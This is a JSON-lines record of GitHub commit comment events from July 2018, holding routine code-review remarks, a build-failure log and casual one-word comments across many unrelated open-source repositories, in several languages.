{"id":"7999816703","type":"CommitCommentEvent","actor":{"login":"Dev-iL"},"repo":{"name":"StackOverflowMATLABchat/uiget"},"payload":{"comment":{"id":29791498,"position":3,"line":1,"path":"uichoose.m","commit_id":"604d841860fb777ca339937e2b6494d36313d52c","created_at":"2018-07-22T07:55:01Z","updated_at":"2018-07-22T07:55:01Z","author_association":"MEMBER","body":"- I would rename the first output to `selection` or `entity` (since it can be a folder name, and then \"file\" doesn't really cover it).\r\n- AFAIK, in the case of `MultiSelect` the output `path` should be the same for all entities. Perhaps it makes sense to output it as a scalar? Perhaps add another optional logical input that says `ScalarPath` and controls this behavior?"}},"created_at":"2018-07-22T07:55:01Z"}
{"id":"7999817218","type":"CommitCommentEvent","actor":{"login":"elrido"},"repo":{"name":"PrivateBin/PrivateBin"},"payload":{"comment":{"id":29791500,"position":15,"line":1443,"path":"js/privatebin.js","commit_id":"3fecd0f2ce8c4fca72612287ccbb0f05d897b9df","created_at":"2018-07-22T07:55:29Z","updated_at":"2018-07-22T07:55:29Z","author_association":"CONTRIBUTOR","body":"In the Prompt object, a private property. It was what needs to be updated, since it wasn't the prompt returned null, this stopped this method from updating it, but then logic in other parts would call Prompt.getPassword() and retrieve the old value that caused issues when a previous prompt had updated it with an incorrect password, the UI would then be stuck, not showing the retry button. Updating it directly avoids that issue and uses one local variable and a line of code less."}},"created_at":"2018-07-22T07:55:29Z"}
{"id":"7999818411","type":"CommitCommentEvent","actor":{"login":"lrinQVQ"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29791502,"position":null,"line":null,"path":null,"commit_id":"2ff7b68dc7ee48e038160a16df79202b0ac3e525","created_at":"2018-07-22T07:56:36Z","updated_at":"2018-07-22T07:56:36Z","author_association":"CONTRIBUTOR","body":"get"}},"created_at":"2018-07-22T07:56:36Z"}
{"id":"7999819910","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29791505,"position":null,"line":null,"path":null,"commit_id":"beba05533a1476ce31b7b2ad30ec93ea0a134dba","created_at":"2018-07-22T07:58:05Z","updated_at":"2018-07-22T07:58:05Z","author_association":"OWNER","body":"Syncing  is an important part of PWA as it allows you to put some actions in sync mode so that they can be performed as soon as the connectivity re-establishes.\r\n\r\nthe above code starts with checking whether the browser supports syncing, using syncmanager\r\nThen we crate a post object which contains the data that needs to be synced.\r\nAn **important point to note here** is that the sync manager can only pick up data from the database. It does not create one of its own like in the case of cache. So, we need to write data first so that it is available for syncing.\r\nhere we created a seperate object store named sync-post and stored out syncing data there.\r\nas soon as data is stored, we register our sync-manager to become active. This can be notified using snackBar like we did above."}},"created_at":"2018-07-22T07:58:05Z"}
{"id":"7999822701","type":"CommitCommentEvent","actor":{"login":"elrido"},"repo":{"name":"PrivateBin/PrivateBin"},"payload":{"comment":{"id":29791519,"position":null,"line":null,"path":null,"commit_id":"3fecd0f2ce8c4fca72612287ccbb0f05d897b9df","created_at":"2018-07-22T08:00:29Z","updated_at":"2018-07-22T08:00:29Z","author_association":"CONTRIBUTOR","body":"They do: Since we don't provide the source or the source maps (just the minified library), they just issue an additional call to the webserver that fails, which slows down the UI, uses bandwidth for no reason and logs a pointless error on the server. Removing it makes the minified library a bit smaller and avoids this pointless overhead.\r\n\r\nThere may be browsers that only make these additional calls when the F12 console is open (where it would help you debug he obfuscated library code), but even then, since we don't ship these additional files it just clutters the console with error messages that make it more difficult to debug our own application."}},"created_at":"2018-07-22T08:00:29Z"}
{"id":"7999823147","type":"CommitCommentEvent","actor":{"login":"Dev-iL"},"repo":{"name":"StackOverflowMATLABchat/uiget"},"payload":{"comment":{"id":29791523,"position":32,"line":32,"path":"uichoose.m","commit_id":"d2b7ee2a4874cee62e4059c699c11a7973fc5860","created_at":"2018-07-22T08:00:54Z","updated_at":"2018-07-22T08:00:54Z","author_association":"MEMBER","body":"I suggest refactoring this to lowerCamelCase (`selectionStr`)to align the style with rest of the code (Java style)."}},"created_at":"2018-07-22T08:00:54Z"}
{"id":"7999823282","type":"CommitCommentEvent","actor":{"login":"lrinQVQ"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29791524,"position":null,"line":null,"path":null,"commit_id":"2ff7b68dc7ee48e038160a16df79202b0ac3e525","created_at":"2018-07-22T08:01:01Z","updated_at":"2018-07-22T08:01:01Z","author_association":"CONTRIBUTOR","body":"好像没有DNS污染也没有SNI RST 只是中国解析的IP延迟太差XD"}},"created_at":"2018-07-22T08:01:01Z"}
{"id":"7999823485","type":"CommitCommentEvent","actor":{"login":"omer826"},"repo":{"name":"omer826/tuchTheNum"},"payload":{"comment":{"id":29791525,"position":null,"line":null,"path":null,"commit_id":"2ac5e7d1beba866929864bee0d13052b5be09247","created_at":"2018-07-22T08:01:12Z","updated_at":"2018-07-22T08:01:12Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-22T08:01:12Z"}
{"id":"7999823884","type":"CommitCommentEvent","actor":{"login":"ChelseaDagger"},"repo":{"name":"Gsuper36/DungeonGame"},"payload":{"comment":{"id":29791528,"position":null,"line":null,"path":null,"commit_id":"8c31c4f0847037dacb1ddaadc77d778b7192007a","created_at":"2018-07-22T08:01:32Z","updated_at":"2018-07-22T08:01:32Z","author_association":"COLLABORATOR","body":"Думаю, лучше удалить эту ветку"}},"created_at":"2018-07-22T08:01:32Z"}
{"id":"7999825462","type":"CommitCommentEvent","actor":{"login":"felixonmars"},"repo":{"name":"lilydjwg/nvchecker"},"payload":{"comment":{"id":29791532,"position":5,"line":21,"path":"setup.py","commit_id":"00f7dccb399429cce9ee2068ef6ee7ca2bce0597","created_at":"2018-07-22T08:02:57Z","updated_at":"2018-07-22T08:02:57Z","author_association":"CONTRIBUTOR","body":"我暂时装回了 [community] 里的非 -git 版 nvchecker，应该能用了。"}},"created_at":"2018-07-22T08:02:57Z"}
{"id":"7999825983","type":"CommitCommentEvent","actor":{"login":"portfolioildiyar"},"repo":{"name":"portfolioildiyar/portfolioildiyar.github.io"},"payload":{"comment":{"id":29791534,"position":22,"line":22,"path":"tech/Tech/style.css","commit_id":"ced5325e6df5bd169e9dec1fd78802ec0c9a8cc8","created_at":"2018-07-22T08:03:26Z","updated_at":"2018-07-22T08:03:26Z","author_association":"OWNER","body":"background"}},"created_at":"2018-07-22T08:03:26Z"}
{"id":"7999826206","type":"CommitCommentEvent","actor":{"login":"omer826"},"repo":{"name":"omer826/tuchTheNum"},"payload":{"comment":{"id":29791535,"position":5,"line":8,"path":"index.html","commit_id":"2ac5e7d1beba866929864bee0d13052b5be09247","created_at":"2018-07-22T08:03:40Z","updated_at":"2018-07-22T08:03:40Z","author_association":"OWNER","body":"rrg"}},"created_at":"2018-07-22T08:03:40Z"}
{"id":"7999826939","type":"CommitCommentEvent","actor":{"login":"georgegabor"},"repo":{"name":"georgegabor/MDN-library-turorial"},"payload":{"comment":{"id":29791536,"position":null,"line":null,"path":null,"commit_id":"5ba23dc0da9a776e7368ae228b229718f8986470","created_at":"2018-07-22T08:04:21Z","updated_at":"2018-07-22T08:04:21Z","author_association":"OWNER","body":"Format style has changed"}},"created_at":"2018-07-22T08:04:21Z"}
{"id":"7999827182","type":"CommitCommentEvent","actor":{"login":"portfolioildiyar"},"repo":{"name":"portfolioildiyar/portfolioildiyar.github.io"},"payload":{"comment":{"id":29791537,"position":21,"line":21,"path":"tech/Tech/style.css","commit_id":"ced5325e6df5bd169e9dec1fd78802ec0c9a8cc8","created_at":"2018-07-22T08:04:35Z","updated_at":"2018-07-22T08:04:35Z","author_association":"OWNER","body":"`background: #febf3c; `"}},"created_at":"2018-07-22T08:04:35Z"}
{"id":"7999829175","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"TheAssassin/AppImageLauncher"},"payload":{"comment":{"id":29791542,"position":null,"line":null,"path":null,"commit_id":"c3e1b274c65f7ecf31e784cf1664d007dd9ff1a1","created_at":"2018-07-22T08:06:25Z","updated_at":"2018-07-22T08:06:25Z","author_association":"NONE","body":"I'm getting a build failure on this commit using or pkgbuild:\r\n```\r\n-- verifying file...\r\n       file='/build/appimagelauncher/src/AppImageLauncher/lib/AppImageKit/xz-EXTERNAL-prefix/src/xz-5.2.3.tar.gz'\r\n-- Downloading... done\r\n-- extracting...\r\n     src='/build/appimagelauncher/src/AppImageLauncher/lib/AppImageKit/xz-EXTERNAL-prefix/src/xz-5.2.3.tar.gz'\r\n     dst='/build/appimagelauncher/src/AppImageLauncher/lib/AppImageKit/xz-EXTERNAL-prefix/src/xz-EXTERNAL'\r\n-- extracting... [tar xfz]\r\n-- extracting... [analysis]\r\n-- extracting... [rename]\r\n-- extracting... [clean up]\r\n-- extracting... done\r\n[  6%] No patch step for 'xz-EXTERNAL'\r\n[  6%] No update step for 'xz-EXTERNAL'\r\n[  6%] Performing configure step for 'xz-EXTERNAL'\r\n/bin/sh: CFLAGS=-march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong -fno-plt: command not found\r\nmake[2]: *** [lib/AppImageKit/CMakeFiles/xz-EXTERNAL.dir/build.make:109: lib/AppImageKit/xz-EXTERNAL-prefix/src/xz-EXTERNAL-stamp/xz-EXTERNAL-configure] Error 127\r\nmake[1]: *** [CMakeFiles/Makefile2:342: lib/AppImageKit/CMakeFiles/xz-EXTERNAL.dir/all] Error 2\r\nmake: *** [Makefile:152: all] Error 2\r\n==> ERROR: A failure occurred in build().\r\n\r\n```\r\n\r\nAny Ideas?"}},"created_at":"2018-07-22T08:06:25Z"}
{"id":"7999830413","type":"CommitCommentEvent","actor":{"login":"kapoorsanj"},"repo":{"name":"kapoorsanj/First_Class"},"payload":{"comment":{"id":29791543,"position":null,"line":null,"path":null,"commit_id":"62c3b1f529f6f692bc4eaf9ef6f27249801cc53b","created_at":"2018-07-22T08:07:37Z","updated_at":"2018-07-22T08:07:37Z","author_association":"OWNER","body":"This is the corrected program that works YEAH."}},"created_at":"2018-07-22T08:07:37Z"}
{"id":"7999830680","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29791544,"position":null,"line":null,"path":null,"commit_id":"c20eae508865b286ccb5ea37c3ae0e695f32768b","created_at":"2018-07-22T08:07:54Z","updated_at":"2018-07-22T08:07:54Z","author_association":"CONTRIBUTOR","body":"Pour faire plus court: Apprivoisement -> dressage/domestication\r\n                                       Vengeance -> riposte/ attaque"}},"created_at":"2018-07-22T08:07:54Z"}
{"id":"7999831179","type":"CommitCommentEvent","actor":{"login":"MarcEdinger"},"repo":{"name":"MarcEdinger/edu"},"payload":{"comment":{"id":29791545,"position":null,"line":null,"path":null,"commit_id":"8c938f6a19e96b9bc52b727e10e045b27ef6eef1","created_at":"2018-07-22T08:08:25Z","updated_at":"2018-07-22T08:08:25Z","author_association":"OWNER","body":"Written the previous commit into the edu.tex file."}},"created_at":"2018-07-22T08:08:25Z"}
{"id":"7999831657","type":"CommitCommentEvent","actor":{"login":"atulopen"},"repo":{"name":"atulopen/website"},"payload":{"comment":{"id":29791546,"position":1,"line":1,"path":"ipsum.txt","commit_id":"b0aba85dcd49e2f14e7dff9de27ca3875c0b4a68","created_at":"2018-07-22T08:08:54Z","updated_at":"2018-07-22T08:08:54Z","author_association":"OWNER","body":"ipsum really?\r\n\r\ndid we donot have any better filller text``"}},"created_at":"2018-07-22T08:08:54Z"}
{"id":"7999832282","type":"CommitCommentEvent","actor":{"login":"Hanamuke"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29791548,"position":null,"line":null,"path":null,"commit_id":"b39cf725b3276338a6f921556d32596f8f91bbe4","created_at":"2018-07-22T08:09:29Z","updated_at":"2018-07-22T08:09:29Z","author_association":"NONE","body":"I don't know if it is intentional, but you don't introduce bias at the cycle detection, which is the main place where 3 folds are detected i would think."}},"created_at":"2018-07-22T08:09:29Z"}
{"id":"7999833191","type":"CommitCommentEvent","actor":{"login":"satyak24"},"repo":{"name":"satish313180/my-repo1"},"payload":{"comment":{"id":29791549,"position":null,"line":null,"path":null,"commit_id":"d061fe8c505238bef50f4b4ebc44a3dc1a542379","created_at":"2018-07-22T08:10:18Z","updated_at":"2018-07-22T08:10:18Z","author_association":"CONTRIBUTOR","body":"hi\r\n+this\r\n+ is\r\n+ the secocnf"}},"created_at":"2018-07-22T08:10:18Z"}
{"id":"7999833317","type":"CommitCommentEvent","actor":{"login":"jetever"},"repo":{"name":"samsarahq/thunder"},"payload":{"comment":{"id":29791551,"position":null,"line":null,"path":null,"commit_id":"251c2ef1b2624d3f4a6cb7e0a0f87c34b121ff30","created_at":"2018-07-22T08:10:24Z","updated_at":"2018-07-22T08:10:24Z","author_association":"NONE","body":"Why remove requestId references?\r\nThank you."}},"created_at":"2018-07-22T08:10:24Z"}
{"id":"7999834015","type":"CommitCommentEvent","actor":{"login":"atulopen"},"repo":{"name":"atulopen/website"},"payload":{"comment":{"id":29791552,"position":null,"line":null,"path":null,"commit_id":"b0aba85dcd49e2f14e7dff9de27ca3875c0b4a68","created_at":"2018-07-22T08:11:04Z","updated_at":"2018-07-22T08:11:04Z","author_association":"OWNER","body":"did we really need this"}},"created_at":"2018-07-22T08:11:04Z"}
{"id":"7999834157","type":"CommitCommentEvent","actor":{"login":"extrowerk"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29791553,"position":13,"line":13,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-22T08:11:11Z","updated_at":"2018-07-22T08:11:11Z","author_association":"MEMBER","body":"It should come after LICENSE"}},"created_at":"2018-07-22T08:11:11Z"}
{"id":"7999835054","type":"CommitCommentEvent","actor":{"login":"extrowerk"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29791554,"position":32,"line":32,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-22T08:12:00Z","updated_at":"2018-07-22T08:12:00Z","author_association":"MEMBER","body":"haiku_devel should pull this too"}},"created_at":"2018-07-22T08:12:00Z"}
{"id":"7999835610","type":"CommitCommentEvent","actor":{"login":"extrowerk"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29791556,"position":60,"line":60,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-22T08:12:28Z","updated_at":"2018-07-22T08:12:28Z","author_association":"MEMBER","body":"prepareInstalledDevelLib (notice the missing s)"}},"created_at":"2018-07-22T08:12:28Z"}
{"id":"7999836163","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29791558,"position":null,"line":null,"path":null,"commit_id":"6fea6c4fec17a36939e657b4acabcb534c3a902a","created_at":"2018-07-22T08:12:57Z","updated_at":"2018-07-22T08:12:57Z","author_association":"CONTRIBUTOR","body":"Самому интересно, как он это делал. (у меня двиг не всегда был активным окном в момент вылета, может из-за этого). "}},"created_at":"2018-07-22T08:12:57Z"}
{"id":"7999837460","type":"CommitCommentEvent","actor":{"login":"Blue-Sky-F"},"repo":{"name":"Blue-Sky-F/PythonCode"},"payload":{"comment":{"id":29791559,"position":1,"line":1,"path":"demo.py","commit_id":"ce079156459ecd31ee646e5f7d620953e002912d","created_at":"2018-07-22T08:14:11Z","updated_at":"2018-07-22T08:14:11Z","author_association":"OWNER","body":"demo\r\n\r\n> helllo world"}},"created_at":"2018-07-22T08:14:11Z"}
{"id":"7999838143","type":"CommitCommentEvent","actor":{"login":"pulkomandy"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29791560,"position":32,"line":32,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-22T08:14:50Z","updated_at":"2018-07-22T08:14:50Z","author_association":"MEMBER","body":"There is a cmd: in the devel package, which complained in -S mode that it depends on libroot. I could have used lib:libroot$secondaryArchSuffix here, I guess."}},"created_at":"2018-07-22T08:14:50Z"}
{"id":"7999838826","type":"CommitCommentEvent","actor":{"login":"pulkomandy"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29791561,"position":60,"line":60,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-22T08:15:21Z","updated_at":"2018-07-22T08:15:21Z","author_association":"MEMBER","body":"Why do we have both? prepareInstalledDevelLibs works also when there is a single lib, so why not always use it and make things simpler?"}},"created_at":"2018-07-22T08:15:21Z"}
{"id":"7999839508","type":"CommitCommentEvent","actor":{"login":"pulkomandy"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29791562,"position":13,"line":13,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-22T08:16:00Z","updated_at":"2018-07-22T08:16:00Z","author_association":"MEMBER","body":"I don't care. And haikuporter doesn't either (add a check to -S mode if this is really important)."}},"created_at":"2018-07-22T08:16:00Z"}
{"id":"7999840125","type":"CommitCommentEvent","actor":{"login":"Blue-Sky-F"},"repo":{"name":"Blue-Sky-F/PythonCode"},"payload":{"comment":{"id":29791564,"position":1,"line":1,"path":"PhotosWall.py","commit_id":"ce079156459ecd31ee646e5f7d620953e002912d","created_at":"2018-07-22T08:16:33Z","updated_at":"2018-07-22T08:16:33Z","author_association":"OWNER","body":"/**\r\n   @auther 徐翼飞\r\n   @content 群相册"}},"created_at":"2018-07-22T08:16:33Z"}
{"id":"7999840261","type":"CommitCommentEvent","actor":{"login":"pawanlakhotia"},"repo":{"name":"lpawan/festmanagement"},"payload":{"comment":{"id":29791565,"position":null,"line":null,"path":null,"commit_id":"b7e99272d6fd69a979d7257afd321de4663dc605","created_at":"2018-07-22T08:16:42Z","updated_at":"2018-07-22T08:16:42Z","author_association":"NONE","body":"###software required"}},"created_at":"2018-07-22T08:16:42Z"}
{"id":"7999840808","type":"CommitCommentEvent","actor":{"login":"kennyzx"},"repo":{"name":"kennyzx/DotNetCore"},"payload":{"comment":{"id":29791566,"position":null,"line":null,"path":null,"commit_id":"12fa092bc1dd325a2cbf9001630d3551551b5f55","created_at":"2018-07-22T08:17:13Z","updated_at":"2018-07-22T08:17:13Z","author_association":"OWNER","body":"I figure it out, the correct way to select multiple classes is\r\n\r\n    .navbar-inverse.red {\r\n        background-color: #7e0000;\r\n    }\r\n\r\n`.navbar-inverse .red` means \r\n\r\n>Select all elements with the class name red that are descendants of the element that are of class .navbar-inverse."}},"created_at":"2018-07-22T08:17:13Z"}
{"id":"7999841256","type":"CommitCommentEvent","actor":{"login":"LoverSnow"},"repo":{"name":"LoverSnow/hellowGit"},"payload":{"comment":{"id":29791567,"position":null,"line":null,"path":null,"commit_id":"b311299aebd58b7dd9762f710123aa764126a0a1","created_at":"2018-07-22T08:17:38Z","updated_at":"2018-07-22T08:17:38Z","author_association":"OWNER","body":"啊啊啊"}},"created_at":"2018-07-22T08:17:38Z"}
{"id":"7999842052","type":"CommitCommentEvent","actor":{"login":"pawanlakhotia"},"repo":{"name":"lpawan/festmanagement"},"payload":{"comment":{"id":29791571,"position":2,"line":3,"path":"README.md","commit_id":"b7e99272d6fd69a979d7257afd321de4663dc605","created_at":"2018-07-22T08:18:24Z","updated_at":"2018-07-22T08:18:24Z","author_association":"NONE","body":"Gdg\r\n"}},"created_at":"2018-07-22T08:18:24Z"}
{"id":"7999842497","type":"CommitCommentEvent","actor":{"login":"bao3"},"repo":{"name":"recall704/tinyFecVPN"},"payload":{"comment":{"id":29791572,"position":null,"line":null,"path":null,"commit_id":"f06b67db103a6a77efe63f4ea9653c8b7a3d82fc","created_at":"2018-07-22T08:18:46Z","updated_at":"2018-07-22T08:18:46Z","author_association":"NONE","body":"@recall704  没关系，直接查看 makefile ，使用 make OPT=-DLIMIT 就可以了，不用修改任何代码 。"}},"created_at":"2018-07-22T08:18:46Z"}
{"id":"7999842579","type":"CommitCommentEvent","actor":{"login":"reckart"},"repo":{"name":"inception-project/inception"},"payload":{"comment":{"id":29791573,"position":136,"line":136,"path":"inception-imls-dl4j/src/main/java/de/tudarmstadt/ukp/inception/recommendation/imls/dl4j/pos/DL4JSequenceRecommender.java","commit_id":"b6dd313e72a02e658b80cac88439562b191cc65a","created_at":"2018-07-22T08:18:52Z","updated_at":"2018-07-22T08:18:52Z","author_association":"CONTRIBUTOR","body":"No because there might not be a context available. Cf. my comment about not needing a context during evaluation."}},"created_at":"2018-07-22T08:18:52Z"}
{"id":"7999844195","type":"CommitCommentEvent","actor":{"login":"pawanlakhotia"},"repo":{"name":"lpawan/festmanagement"},"payload":{"comment":{"id":29791574,"position":null,"line":null,"path":null,"commit_id":"b7e99272d6fd69a979d7257afd321de4663dc605","created_at":"2018-07-22T08:20:16Z","updated_at":"2018-07-22T08:20:16Z","author_association":"NONE","body":"Software required:\r\n● NetBeans\r\n● Oracle DB"}},"created_at":"2018-07-22T08:20:16Z"}
{"id":"7999854414","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791597,"position":28,"line":28,"path":"src/helpers.js","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:29:43Z","updated_at":"2018-07-22T08:29:43Z","author_association":"OWNER","body":"Если сделать на редаксе, то копирования можно избежать. \r\nВ крайнем случае можно использовать https://reactjs.org/docs/update.html"}},"created_at":"2018-07-22T08:29:43Z"}
{"id":"7999854468","type":"CommitCommentEvent","actor":{"login":"elichai"},"repo":{"name":"enigmampc/surface"},"payload":{"comment":{"id":29791598,"position":5,"line":2,"path":"src/surface/config.json","commit_id":"1deb3e5abb01907a141a67f3d940193099beb9ef","created_at":"2018-07-22T08:29:46Z","updated_at":"2018-07-22T08:29:46Z","author_association":"COLLABORATOR","body":"FYI, according to `git blame`, it seems like it only happened once and it's just that no one fixed it since."}},"created_at":"2018-07-22T08:29:46Z"}
{"id":"7999856684","type":"CommitCommentEvent","actor":{"login":"hawkeye116477"},"repo":{"name":"piperun/iploggerfilter"},"payload":{"comment":{"id":29791605,"position":3,"line":6,"path":"README.md","commit_id":"e4943f9196d825a7c6904159efad5bf732095fc6","created_at":"2018-07-22T08:31:38Z","updated_at":"2018-07-22T08:31:38Z","author_association":"NONE","body":"On ABP this will block a little resources only from this domains, but not entire pages. So pages will be still working, but bit spoiled :smile:. Also if you didn't add `[Adblock Plus 2.0]` on first line of filterlist, it didn't accept it."}},"created_at":"2018-07-22T08:31:38Z"}
{"id":"7999856763","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791606,"position":45,"line":45,"path":"src/helpers.js","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:31:44Z","updated_at":"2018-07-22T08:31:44Z","author_association":"OWNER","body":"Ты идешь только на одну ступень вглубь. Если элементы массива - объекты либо если значения полей объекта тоже объекты, то они не будут скопированы. Здесь нужно использовать рекурсию и вызывать `copyState` для каждого элемента массива и каждого элемента объекта."}},"created_at":"2018-07-22T08:31:44Z"}
{"id":"7999857494","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791607,"position":58,"line":58,"path":"src/helpers.js","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:32:23Z","updated_at":"2018-07-22T08:32:23Z","author_association":"OWNER","body":"`31556926000` - магическое число. Лучше вынести его в переменную и дать ей имя"}},"created_at":"2018-07-22T08:32:23Z"}
{"id":"7999858246","type":"CommitCommentEvent","actor":{"login":"WangBo12"},"repo":{"name":"hittj/HUAJI_game"},"payload":{"comment":{"id":29791608,"position":null,"line":null,"path":null,"commit_id":"2881437db082eee90f8737f1788b731c60e31deb","created_at":"2018-07-22T08:33:06Z","updated_at":"2018-07-22T08:33:06Z","author_association":"CONTRIBUTOR","body":"游戏时生命值的爱心图标消失，现已在我本地进行修复。"}},"created_at":"2018-07-22T08:33:06Z"}
{"id":"7999858644","type":"CommitCommentEvent","actor":{"login":"wushaopeng"},"repo":{"name":"cxinping/PyQt5"},"payload":{"comment":{"id":29791609,"position":12,"line":12,"path":"Chapter01/EricPro01/FirstWin.py","commit_id":"c28fee5df665dcf13d22e271dcc6d2a37b8851da","created_at":"2018-07-22T08:33:27Z","updated_at":"2018-07-22T08:33:27Z","author_association":"NONE","body":"看看这是哈\r\n"}},"created_at":"2018-07-22T08:33:27Z"}
{"id":"7999860727","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791616,"position":63,"line":63,"path":"src/helpers.js","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:35:23Z","updated_at":"2018-07-22T08:35:23Z","author_association":"OWNER","body":"Можно сразу писать `export function getPhraseAccordingToNumber`"}},"created_at":"2018-07-22T08:35:23Z"}
{"id":"7999863133","type":"CommitCommentEvent","actor":{"login":"marscher"},"repo":{"name":"arose/nglview"},"payload":{"comment":{"id":29791619,"position":null,"line":null,"path":null,"commit_id":"98b8ce78f3669273c0fd06632a4894d4d1f75d5b","created_at":"2018-07-22T08:37:32Z","updated_at":"2018-07-22T08:37:32Z","author_association":"CONTRIBUTOR","body":":+1: "}},"created_at":"2018-07-22T08:37:32Z"}
{"id":"7999863373","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791620,"position":63,"line":63,"path":"src/helpers.js","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:37:43Z","updated_at":"2018-07-22T08:37:43Z","author_association":"OWNER","body":"Эта функция обычно называется `pluralize`"}},"created_at":"2018-07-22T08:37:43Z"}
{"id":"7999863841","type":"CommitCommentEvent","actor":{"login":"marscher"},"repo":{"name":"arose/nglview"},"payload":{"comment":{"id":29791621,"position":null,"line":null,"path":null,"commit_id":"98b8ce78f3669273c0fd06632a4894d4d1f75d5b","created_at":"2018-07-22T08:38:12Z","updated_at":"2018-07-22T08:38:12Z","author_association":"CONTRIBUTOR","body":"do you want to be added as a maintainer for the feedstock @hainm?"}},"created_at":"2018-07-22T08:38:12Z"}
{"id":"7999864356","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791623,"position":68,"line":68,"path":"src/helpers.js","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:38:40Z","updated_at":"2018-07-22T08:38:40Z","author_association":"OWNER","body":"Для этого есть простые формулы чтобы не гонять числа в строки и обратно"}},"created_at":"2018-07-22T08:38:40Z"}
{"id":"7999864745","type":"CommitCommentEvent","actor":{"login":"mhidalgop89"},"repo":{"name":"mhidalgop89/reciclaje"},"payload":{"comment":{"id":29791624,"position":null,"line":null,"path":null,"commit_id":"0dd00410bce4c1218cb805d51abd49e626072676","created_at":"2018-07-22T08:39:03Z","updated_at":"2018-07-22T08:39:03Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-22T08:39:03Z"}
{"id":"7999866495","type":"CommitCommentEvent","actor":{"login":"ikeike-no-ike"},"repo":{"name":"ikeike-no-ike/ikeike-no-ike.github.io"},"payload":{"comment":{"id":29791629,"position":null,"line":null,"path":null,"commit_id":"58db8201ed699640c12795b0fd8841519ce10ed5","created_at":"2018-07-22T08:40:35Z","updated_at":"2018-07-22T08:40:35Z","author_association":"OWNER","body":"イイねっ"}},"created_at":"2018-07-22T08:40:35Z"}
{"id":"7999866605","type":"CommitCommentEvent","actor":{"login":"ikeike-no-ike"},"repo":{"name":"ikeike-no-ike/ikeike-no-ike.github.io"},"payload":{"comment":{"id":29791630,"position":null,"line":null,"path":null,"commit_id":"58db8201ed699640c12795b0fd8841519ce10ed5","created_at":"2018-07-22T08:40:42Z","updated_at":"2018-07-22T08:40:42Z","author_association":"OWNER","body":"LGTM"}},"created_at":"2018-07-22T08:40:42Z"}
{"id":"7999868808","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791639,"position":24,"line":24,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:42:38Z","updated_at":"2018-07-22T08:42:38Z","author_association":"OWNER","body":"👍 за биндинги в конструкторе"}},"created_at":"2018-07-22T08:42:38Z"}
{"id":"7999871529","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791645,"position":98,"line":98,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:45:03Z","updated_at":"2018-07-22T08:45:03Z","author_association":"OWNER","body":"Вместо переменной `game` можно сразу делать `return`"}},"created_at":"2018-07-22T08:45:03Z"}
